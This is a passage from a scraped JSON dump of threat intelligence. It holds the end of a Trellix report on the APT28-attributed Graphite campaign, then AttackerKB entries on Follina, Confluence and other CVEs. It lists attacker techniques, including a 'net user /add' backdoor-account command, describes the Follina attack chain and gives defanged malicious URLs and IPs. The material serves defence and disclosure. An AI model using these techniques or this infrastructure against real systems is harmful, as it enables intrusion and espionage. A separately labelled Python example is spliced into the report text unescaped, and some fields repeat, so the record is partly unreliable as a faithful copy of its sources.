Local Empire server execution with default configuration**\n\nWith the aforementioned information, together with the command-and-control address extracted from the last stage of the malware, we can confirm that this host acts as an Empire server used to remotely control the agents installed on victims\u2019 machines and to send them commands to execute.\n\n#### Attribution\n\nDuring the period of this operation there were political tensions around the Armenian and Azerbaijani border. From a classic intelligence-operation point of view, it would therefore make sense to infiltrate and gather information to assess the risk and movements of the different parties involved. \n\nThroughout our research into the Graphite campaign, we extracted all timestamps of attacker activity from our telemetry and found two consistent trends. First, the adversary is active from Monday to Friday, as depicted in the image below:\n\n **Figure 25. Adversary\u2019s working days**\n\nSecond, the activity timestamps correspond to normal business hours (from 08h to 18h) in the GMT+3 time zone, which includes Moscow Time, Turkey Time, Arabia Standard Time and East Africa Time. Working-hour analysis only narrows the operators down to a UTC offset, not to a country, and it assumes they did not deliberately shift their schedule.\n\n **Figure 26. Adversary\u2019s working hours**\n\nAnother interesting discovery during the investigation was that the attackers used the CLSID (D9144DCD-E998-4ECA-AB6A-DCD83CCBA16D) for persistence, which matches a CLSID noted in an ESET report on a Russian operation targeting Eastern European countries.\n\nAnalyzing and comparing code blocks and sequences from the Graphite malware with our database of samples, we discovered overlap with samples from 2018 that were attributed to APT28. 
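The working-day and working-hour pattern used in the Attribution section above can be derived mechanically from event timestamps. The Python below is an added example, not code from the Trellix report: for each candidate UTC offset it scores what fraction of events fall on Monday to Friday between 08:00 and 18:00 local time and reports the best-fitting offsets. The timestamps in it are constructed so that activity sits at 08:00 to 18:00 at UTC+3 with two off-hours outliers; they are not the report's telemetry. Ties in the result are expected and meaningful: the method narrows to an offset, which several time zones share, and assumes a consistent schedule.

```python
"""Infer an operator's likely UTC offset from activity timestamps.

Added example, not part of the Trellix report. For each candidate UTC
offset, count how many events fall on Monday..Friday between 08:00 and
18:00 local time and report the offset(s) that fit best. The timestamps
below are constructed for the example, not the report's telemetry.
"""
from datetime import datetime, timedelta, timezone

WORK_START, WORK_END = 8, 18          # 08h..18h local, as in the report


def business_hour_fit(events_utc, offset_hours: int) -> float:
    """Fraction of events inside Mon-Fri 08:00-18:00 at the given UTC offset."""
    tz = timezone(timedelta(hours=offset_hours))
    hits = 0
    for ts in events_utc:
        local = ts.astimezone(tz)
        if local.weekday() < 5 and WORK_START <= local.hour < WORK_END:
            hits += 1
    return hits / len(events_utc)


def best_offsets(events_utc, candidates=range(-12, 15)):
    """Return (best_fit, [offsets achieving it]). Ties are expected: a
    working-hours pattern only narrows to an offset, not a single zone."""
    scores = {off: business_hour_fit(events_utc, off) for off in candidates}
    best = max(scores.values())
    return best, [off for off, s in scores.items() if s == best]


def constructed_events():
    """Constructed UTC timestamps: weekday activity 05:30-14:30 UTC (that is,
    08:30-17:30 at UTC+3) over two working weeks, plus two off-hours outliers."""
    base = datetime(2021, 10, 4, tzinfo=timezone.utc)   # a Monday
    events = []
    for day in range(10):                               # two working weeks
        d = base + timedelta(days=day)
        if d.weekday() >= 5:
            continue
        for hour in (5, 7, 9, 11, 13, 14):
            events.append(d.replace(hour=hour, minute=30))
    events.append(base.replace(hour=20))                # late-evening outlier
    events.append((base + timedelta(days=5)).replace(hour=9))  # Saturday outlier
    return events


if __name__ == "__main__":
    ev = constructed_events()
    fit, offs = best_offsets(ev)
    print(f"best fit {fit:.2f} at UTC offset(s) {offs}")
```

Feed it real UTC timestamps (for example the attacker's request times from proxy or mail-gateway logs) and read a tie list as exactly that: UTC+3 covers Moscow, Istanbul, Riyadh and Nairobi alike, and daylight-saving changes or a deliberately skewed schedule can move the best fit by an hour.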
For example, we compared our samples with the following one (SHA-1: 5bb9f53636efafdd30023d44be1be55bf7c7b7d5):\n\n **Figure 27. Code comparison of samples**\n\nWhen we zoom in on some of the functions, we see on the left side of the picture below the Graphite sample and on the right the aforementioned 2018 sample. With almost three years between the samples, code changes are expected, but the author evidently kept some of the earlier functions:\n\n **Figure 28. Similar function flow**\n\nAlthough we have described some tactics, techniques and procedures (TTPs) of the actors behind this campaign, the context, code similarities and infrastructure overlap we have support no more than a low-to-moderate-confidence link to APT28, and not a nation-state sponsor. However, we believe we are dealing with a skilled actor, based on how the infrastructure, malware and operation were set up. \n\n#### Conclusion\n\nThe analysis of the campaign described in this blog post allowed us to gather insights into a multi-stage attack performed in early October, leveraging the MSHTML remote code execution vulnerability (CVE-2021-40444) to target countries in Eastern Europe. \n\nAs seen in the analysis of the Graphite malware, one quite innovative piece of functionality is the use of the OneDrive service as command and control, by querying the Microsoft Graph API with a token hardcoded in the malware. This type of communication lets the malware blend in on victims\u2019 systems, since it only connects to legitimate Microsoft domains and produces no traffic to unusual destinations; detection therefore has to rely on which process is making the Graph API calls and on the hardcoded token, which can be extracted from the sample as an indicator.\n\nThanks to the analysis of the full attack process, we were able to identify new infrastructure acting as command and control for the actors, as well as the final payload, which is an agent of the post-exploitation framework Empire. 
All the above allowed us to construct a timeline of the activity observed in the campaign.\n\nThe actors behind the attack seem very advanced, based on the targeting, the malware and the infrastructure used in the operation, so we presume that the main goal of this campaign is espionage. With low to moderate confidence, we believe this operation was executed by APT28. To support further investigation, we have provided tactics, techniques and procedures (TTPs), infrastructure indicators, targeting and capabilities to detect this campaign.\n\n#### MITRE ATT&CK Techniques\n\nTactic | Technique ID | Technique Title | Observable | IOCs \n---|---|---|---|--- \nResource Development | T1583.001 | Acquire Infrastructure: Domains | Attackers purchased domains to be used for command and control. | wordkeyvpload[.]net, wordkeyvpload[.]org \nResource Development | T1587.001 | Develop Capabilities: Malware | Attackers built malicious components to conduct their attack. | Graphite malware \nResource Development | T1588.002 | Obtain Capabilities: Tool | Attackers employed red-teaming tools to conduct their attack. | Empire \nInitial Access | T1566.001 | Phishing: Spearphishing Attachment | Adversaries sent spearphishing emails with a malicious attachment to gain access to victim systems. | BM-D(2021)0247.xlsx \nExecution | T1203 | Exploitation for Client Execution | Adversaries exploited a vulnerability in Microsoft Office to execute code. | CVE-2021-40444 \nExecution | T1059.001 | Command and Scripting Interpreter: PowerShell | Adversaries abused PowerShell to execute the Empire stager. | Empire PowerShell stager \nPersistence | T1546.015 | Event Triggered Execution: Component Object Model Hijacking | Adversaries established persistence by executing malicious content triggered by hijacked references to Component Object Model (COM) objects. 
| CLSID: D9144DCD-E998-4ECA-AB6A-DCD83CCBA16D \nPersistence | T1136.001 | Create Account: Local Account | Adversaries created a local account to maintain access to victim systems. | net user /add user1 \nDefense Evasion | T1620 | Reflective Code Loading | Adversaries reflectively loaded code into a process to conceal the execution of malicious payloads. | Empire DLL Launcher stager \nCommand and Control | T1104 | Multi-Stage Channels | Adversaries used multiple stages to obfuscate the command-and-control channel and make detection more difficult. | Use of different Empire stagers \nCommand and Control | T1102.002 | Web Service: Bidirectional Communication | Adversaries used an existing, legitimate external web service as a means of sending commands to and receiving output from a compromised system over the web service channel. | Microsoft OneDrive, Empire server \nCommand and Control | T1573.001 | Encrypted Channel: Symmetric Cryptography | Adversaries employed a known symmetric encryption algorithm to conceal command-and-control traffic rather than relying on any inherent protections provided by a communication protocol. | AES-256 \nCommand and Control | T1573.002 | Encrypted Channel: Asymmetric Cryptography | Adversaries employed a known asymmetric encryption algorithm to conceal command-and-control traffic rather than relying on any inherent protections provided by a communication protocol. 
| RSA \n \n#### Indicators of Compromise (IOCs)\n\n##### First stage \u2013 Excel Downloaders\n\n40d56f10a54bd8031191638e7df74753315e76f198192b6e3965d182136fc2fa \nf007020c74daa0645b181b7b604181613b68d195bd585afd71c3cd5160fb8fc4 \n7bd11553409d635fe8ad72c5d1c56f77b6be55f1ace4f77f42f6bfb4408f4b3a \n9052568af4c2e9935c837c9bdcffc79183862df083b58aae167a480bd3892ad0 \n\n\n##### Second stage \u2013 Downloader DLL\n\n1ee602e9b6e4e58dfff0fb8606a41336723169f8d6b4b1b433372bf6573baf40 \n\n\n##### Third stage \u2013 Graphite\n\n35f2a4d11264e7729eaf7a7e002de0799d0981057187793c0ba93f636126135f \nf229a8eb6f5285a1762677c38175c71dead77768f6f5a6ebc320679068293231 \n\n\n##### Fourth stage \u2013 DLL Launcher Stager\n\n25765faedcfee59ce3f5eb3540d70f99f124af4942f24f0666c1374b01b24bd9 \n\n\n##### Fifth stage \u2013 PowerShell C# Stager\n\nd5c81423a856e68ad5edaf410c5dfed783a0ea4770dbc8fb4943406c316a4317 \n\n\n##### Sixth stage \u2013 Empire HTTP Powershell Stager\n\nda5a03bd74a271e4c5ef75ccdd065afe9bd1af749dbcff36ec7ce58bf7a7db37 \n\n\n##### URLs\n\nhxxps://wordkeyvpload[.]net/keys/Missions Budget Lb.xls \nhxxps://wordkeyvpload[.]net/keys/parliament_rew.xls \nhxxps://wordkeyvpload[.]net/keys/Missions Budget.xls \nhxxps://wordkeyvpload[.]net/keys/TR_comparison.xls \n\n\nhxxps://wordkeyvpload[.]net/keys/JjnJq3.html \nhxxps://wordkeyvpload[.]net/keys/iz7hfD.html \nhxxps://wordkeyvpload[.]net/keys/Ari2Rc.html \nhxxps://wordkeyvpload[.]net/keys/OD4cNq.html \n\n\nhxxps://wordkeyvpload[.]net/keys/0YOL4.cab \nhxxps://wordkeyvpload[.]net/keys/whmel.cab \nhxxps://wordkeyvpload[.]net/keys/UdOpQ.cab \nhxxps://wordkeyvpload[.]net/keys/D9V5E.cab \n\n\nhxxps://wordkeyvpload[.]net/keys/update.dat \n\n\nhxxps://wordkeyvpload[.]org/index.jsp \nhxxps://wordkeyvpload[.]org/index.php \nhxxps://wordkeyvpload[.]org/news.php \nhxxps://wordkeyvpload[.]org/admin/get.php \nhxxps://wordkeyvpload[.]org/login/process.php \n\n\n##### Domains\n\nwordkeyvpload[.]net \nwordkeyvpload[.]org \njimbeam[.]live \n\n\n##### 
IPs\n\n131.153.96[.]114 \n185.117.88[.]19 \n94.140.112[.]178 \n\n", "cvss3": {}, "published": "2022-01-25T00:00:00", "type": "trellix", "title": "Prime Minister\u2019s Office Compromised: Details of Recent Espionage Campaign", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2021-40444"], "modified": "2022-01-25T00:00:00", "id": "TRELLIX:6949BCDE9887B6759BD81365E21DD71C", "href": "https://www.trellix.com/content/mainsite/en-us/about/newsroom/stories/research/prime-ministers-office-compromised.html", "cvss": {"score": 0.0, "vector": "NONE"}}], "attackerkb": [{"lastseen": "2023-08-12T02:18:12", "description": "Microsoft Windows Support Diagnostic Tool (MSDT) Remote Code Execution Vulnerability.\n\n \n**Recent assessments:** \n \n**bwatters-r7** at May 31, 2022 12:56pm UTC reported:\n\nEDIT: This was a quick description, and while it is still accurate as far as I know, a Rapid7 evaluation with greater analysis has been published here: <https://attackerkb.com/topics/Z0pUwH0BFV/cve-2022-30190/rapid7-analysis>\n\nThis is a relatively new vulnerability in the Microsoft Support Diagnostic Tool, so it is likely more information will come out in the coming days. \nCurrently, as seen in the wild, this vulnerability is embedded in a Word document and likely distributed with a *.rar file. When the Word document is opened, it reaches out and downloads an HTML file which has a JS section to implement the ms-msdt (Microsoft Support Diagnostic Tool) protocol, which is then coerced into launching a command. \nAs reported by Jake Williams in a thread here: <https://twitter.com/MalwareJake/status/1531019243411623939>, the command opens the accompanying `*.rar` file and pulls a base64-encoded `*.cab` file from it, then expands the `*.cab` file and runs a file contained in the cab file called `rgb.exe`. THIS FILENAME IS LIKELY MUTABLE, SO I DO NOT RECOMMEND POLICING FOR IT WITHOUT OTHER RULES. 
\nMicrosoft has already published mitigation techniques for this exploit: <https://msrc-blog.microsoft.com/2022/05/30/guidance-for-cve-2022-30190-microsoft-support-diagnostic-tool-vulnerability/> \nUsers are required to delete a single registry key called `HKEY_CLASSES_ROOT\\ms-msdt` though there is little discussion about the side effects of this operation. In his thread, Jake Williams has verified that the removal of this key prevents execution of the embedded payload. \nFurther reading: \n<https://doublepulsar.com/follina-a-microsoft-office-code-execution-vulnerability-1a47fce5629e> \nUntested and unverified PoC: <https://github.com/chvancooten/follina.py/blob/main/follina.py> \n<https://www.scythe.io/library/breaking-follina-msdt-vulnerability>\n\nUPDATE: I adjusted the attacker value up in light of reports by Kevin Beaumont that if the attacker uses an RTF file as the host, then the exploit code will run just viewing the file in the preview pane with explorer.exe. (details here: <https://github.com/JMousqueton/PoC-CVE-2022-30190> and the above doublepulsar blog post)\n\nAssessed Attacker Value: 4 \nAssessed Attacker Value: 4Assessed Attacker Value: 4\n", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2022-06-02T00:00:00", "type": "attackerkb", "title": "CVE-2022-30190", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": 
"COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-40444", "CVE-2022-30190"], "modified": "2022-06-02T00:00:00", "id": "AKB:1FA9A53C-0452-4411-96C9-C0DD833F8D18", "href": "https://attackerkb.com/topics/Z0pUwH0BFV/cve-2022-30190", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-09-07T18:30:04", "description": "Win32k Elevation of Privilege Vulnerability. This CVE ID is unique from CVE-2022-21887.\n\n \n**Recent assessments:** \n \n**gwillcox-r7** at January 18, 2022 4:35pm UTC reported:\n\nLooks like this is a LPE in win32k that is being exploited in the wild according to Microsoft to let attackers escalate their privileges to SYSTEM. Attack complexity on this is high which is understandable given the history of win32k and the complexities regarding its architecture which was built before modern security mitigations were implemented. With that being said though the finder of this bug, at <https://twitter.com/b2ahex/status/1481233350840893442>, notes that exploitation is easy and that this is a patch bypass for CVE-2021-1732, which was a window object type confusion leading to an OOB (out-of-bounds) write as noted by McAfee\u2019s technical writeup at <https://www.mcafee.com/blogs/enterprise/mcafee-enterprise-atr/technical-analysis-of-cve-2021-1732/>.\n\nOf particular note here is that they credit Big CJTeam of Tianfu Cup and RyeLv aka @b2ahex on Twitter for finding this vulnerability. 
They note that this was exploited in the wild but the mention of Tianfu Cup is interesting as it suggests this was also reported to China\u2019s government via the Chinese Tianfu Cup hacking competition.\n\nAssessed Attacker Value: 4 \nAssessed Attacker Value: 4Assessed Attacker Value: 3\n", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-02-08T00:00:00", "type": "attackerkb", "title": "CVE-2022-21882", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.2, "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-1732", "CVE-2022-21882", "CVE-2022-21887"], "modified": "2022-02-08T00:00:00", "id": "AKB:9E1E5A73-8C4D-4A6A-96A5-14A9041AA2CB", "href": "https://attackerkb.com/topics/KBiVbKrlyU/cve-2022-21882", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-07-04T17:20:52", "description": "In kbase_jd_user_buf_pin_pages of mali_kbase_mem.c, there is a possible out of bounds write due to a logic error in the code. This could lead to local escalation of privilege with no additional execution privileges needed. 
User interaction is not needed for exploitation.Product: AndroidVersions: Android kernelAndroid ID: A-210470189References: N/A\n\n \n**Recent assessments:** \n \nAssessed Attacker Value: 0 \nAssessed Attacker Value: 0Assessed Attacker Value: 0\n", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-03-16T00:00:00", "type": "attackerkb", "title": "CVE-2021-39793", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.2, "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-39793"], "modified": "2022-03-16T00:00:00", "id": "AKB:CC573E3E-6D5A-41AC-B91C-D1B70E18674F", "href": "https://attackerkb.com/topics/MjXft2mOzN/cve-2021-39793", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-06-02T05:14:59", "description": "A buffer overflow issue was addressed with improved memory handling. This issue is fixed in iOS 15.2 and iPadOS 15.2. 
An application may be able to execute arbitrary code with kernel privileges.\n\n \n**Recent assessments:** \n \nAssessed Attacker Value: 0 \nAssessed Attacker Value: 0Assessed Attacker Value: 0\n", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2022-01-10T00:00:00", "type": "attackerkb", "title": "CVE-2021-30983", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-30983"], "modified": "2022-01-10T00:00:00", "id": "AKB:12E53A37-65EB-4DDE-B8B5-4725EB276697", "href": "https://attackerkb.com/topics/pIW8qzO7iM/cve-2021-30983", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-08-11T23:29:38", "description": "In affected versions of Confluence Server and Data Center, an OGNL injection vulnerability exists that would allow an unauthenticated attacker to execute arbitrary code on a Confluence Server or Data Center instance. 
The affected versions are from 1.3.0 before 7.4.17, from 7.13.0 before 7.13.7, from 7.14.0 before 7.14.3, from 7.15.0 before 7.15.2, from 7.16.0 before 7.16.4, from 7.17.0 before 7.17.4, and from 7.18.0 before 7.18.1.\n\n \n**Recent assessments:** \n \n**noraj** at April 15, 2023 7:34pm UTC reported:\n\nIt\u2019s easy to weaponize, even manually but there are dozens of exploits available. There is a [TryHackMe room](<https://tryhackme.com/room/cve202226134>) about CVE-2022-26134 to practice in a lab environment.\n\n**jbaines-r7** at June 03, 2022 7:21pm UTC reported:\n\nIt\u2019s easy to weaponize, even manually but there are dozens of exploits available. There is a [TryHackMe room](<https://tryhackme.com/room/cve202226134>) about CVE-2022-26134 to practice in a lab environment.\n\nAssessed Attacker Value: 4 \nAssessed Attacker Value: 4Assessed Attacker Value: 5\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-07-13T00:00:00", "type": "attackerkb", "title": "CVE-2022-26134", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-11776", "CVE-2021-26084", "CVE-2022-26134", 
"CVE-2022-26314"], "modified": "2022-07-13T00:00:00", "id": "AKB:812ED357-C31F-4733-AFDA-96FACDD8A486", "href": "https://attackerkb.com/topics/BH1D56ZEhs/cve-2022-26134", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-06-14T14:46:17", "description": "A use after free issue was addressed with improved memory management. This issue is fixed in macOS Monterey 12.2.1, iOS 15.3.1 and iPadOS 15.3.1, Safari 15.3 (v. 16612.4.9.1.8 and 15612.4.9.1.8). Processing maliciously crafted web content may lead to arbitrary code execution. Apple is aware of a report that this issue may have been actively exploited..\n\n \n**Recent assessments:** \n \n**Obligado1** at May 03, 2022 7:06am UTC reported:\n\nAssessed Attacker Value: 5 \nAssessed Attacker Value: 5Assessed Attacker Value: 3\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2022-03-18T00:00:00", "type": "attackerkb", "title": "CVE-2022-22620", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-22620"], "modified": "2022-03-18T00:00:00", "id": "AKB:12497ECD-6565-46DB-AD65-2F25827C7711", "href": 
"https://attackerkb.com/topics/82P5tenpQJ/cve-2022-22620", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-07-25T08:25:28", "description": "A memory corruption issue was addressed with improved input validation. This issue is fixed in iOS 15.3 and iPadOS 15.3, macOS Big Sur 11.6.3, macOS Monterey 12.2. A malicious application may be able to execute arbitrary code with kernel privileges. Apple is aware of a report that this issue may have been actively exploited..\n\n \n**Recent assessments:** \n \nAssessed Attacker Value: 0 \nAssessed Attacker Value: 0Assessed Attacker Value: 0\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-03-18T00:00:00", "type": "attackerkb", "title": "CVE-2022-22587", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-22587"], "modified": "2022-03-18T00:00:00", "id": "AKB:F7DBB7CA-A582-4BC6-87C3-ACA4DBC4F58B", "href": "https://attackerkb.com/topics/ZFSs2HwdT4/cve-2022-22587", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-06-05T11:16:11", "description": "Windows LSA Spoofing 
Vulnerability.\n\n \n**Recent assessments:** \n \nAssessed Attacker Value: 0 \nAssessed Attacker Value: 0Assessed Attacker Value: 0\n", "cvss3": {"exploitabilityScore": 2.2, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 5.9, "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:H/A:N", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2022-05-10T00:00:00", "type": "attackerkb", "title": "CVE-2022-26925", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-26925"], "modified": "2022-05-10T00:00:00", "id": "AKB:C3852904-E628-40EE-9AD4-445FC1899CF7", "href": "https://attackerkb.com/topics/vfyTk7fBGp/cve-2022-26925", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}}, {"lastseen": "2023-06-01T02:19:45", "description": "Type confusion in V8 in Google Chrome prior to 91.0.4472.101 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page.\n\n \n**Recent assessments:** \n \nAssessed Attacker Value: 0 \nAssessed Attacker Value: 0Assessed Attacker Value: 0\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": 
"NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2021-06-15T00:00:00", "type": "attackerkb", "title": "CVE-2021-30551", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-30551"], "modified": "2021-06-18T00:00:00", "id": "AKB:732A3017-A62C-4347-9709-9B8790F47FA1", "href": "https://attackerkb.com/topics/V4ywqx3Gej/cve-2021-30551", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-06-15T11:30:00", "description": "In affected versions of Confluence Server and Data Center, an OGNL injection vulnerability exists that would allow an authenticated user, and in some instances an unauthenticated user, to execute arbitrary code on a Confluence Server or 